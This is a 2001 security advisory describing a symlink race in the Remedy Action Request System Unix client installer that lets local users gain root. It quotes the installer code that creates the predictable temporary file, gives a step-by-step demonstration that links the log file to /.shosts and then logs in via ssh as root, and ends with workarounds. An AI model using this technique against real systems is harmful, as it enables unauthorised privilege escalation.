Security Holes in Remedy Client Installer Summary ------- Due to improper handling of temporary files, the installer program for Remedy Software's Action Request System client for unix can allow local users to gain root privileges. Details ------- The installer script for the unix AR clients (ar_install) uses files with predicatable names in world-writeable locations to store temporary files and logging information. The code does not check to see if the files exist before writing to them, or if the files are symbolic links to something else. A local user can exploit this (by symbolically linking the target files to something else ahead of time) to create or overwrite files anywhere on the system. If the AR client is installed as root, this type of attack can be used by unprivileged users to gain root access under the right circumstances (eg. a local user knows that the AR client will be installed on a system in the near future). There are several instances of this problem in ar_install. A few examples: # Name of the file to record a log of the installation into # LOGFILE="/usr/tmp/arClient_install.log" ... ############################################ # lecho - Logged echo to stdout # Arg 0 to N = Data to be echoed ############################################ lecho() { echo "$@" >> $LOGFILE echo "$@" } The lecho function is then frequently used to write logging data to $LOGFILE. Another example: # # Test if "ex -" has any problem on this machine. If there is, use "ex" # echo "$PROD" > /tmp/ex.test ex - /tmp/ex.test << EOF /$PROD/ s/$PROD/$PROD_LONG/ w! q EOF RET=$? RES=`cat /tmp/ex.test` if [ \( $RET -eq 0 \) -a \( "$RES" = "$PROD_LONG" \) ] then EX="ex -" else EX="ex" fi Demonstration ------------- $ hostname brokenhost $ id uid=5000(foo) gid=20(users) $ ln -s /.shosts /var/tmp/arClient_install.log $ ls -alt /var/tmp/arClient_install.log lrwxrwxrwx 1 foo users 8 Apr 12 14:57 /var/tmp/arClient_install.log -> /.shosts ...wait for root to run ar_install... $ ls -alt /.shosts -rw-rw-rw- 1 root other 50873 Apr 12 14:58 /.shosts $ cat > /.shosts brokenhost foo ^D $ ssh -l root brokenhost Last login: Thu Apr 12 14:50:30 from someotherhost Sun Microsystems Inc. SunOS 5.6 Generic August 1997 brokenhost # id uid=0(root) gid=1(other) brokenhost # Vulnerable Versions ------------------- I have tested this on Solaris 2.6 and 8, using the installer for AR 4.5.1. The installers for the other supported unix versions (Irix, AIX, HP/UX and NCR System 3000) contain similar issues, so it's likely that they are vulnerable as well. The older versions of AR that are available for some platforms (3.2.1) use a different install script. That script uses different filenames, but appears to have similar flaws. Workaround ---------- If the AR client is being installed on a single-user workstation, it can be installed as a non-root user (this is not the default, but the documentation explains how to do it). If the AR client must be installed as root, ar_install can be trivially modified to avoid using a world-readable/writeable space to store its temporary files. Vendor Notification ------------------- The vendor was notified on 4/13/2001. Copyright 4/12/2001, by echo8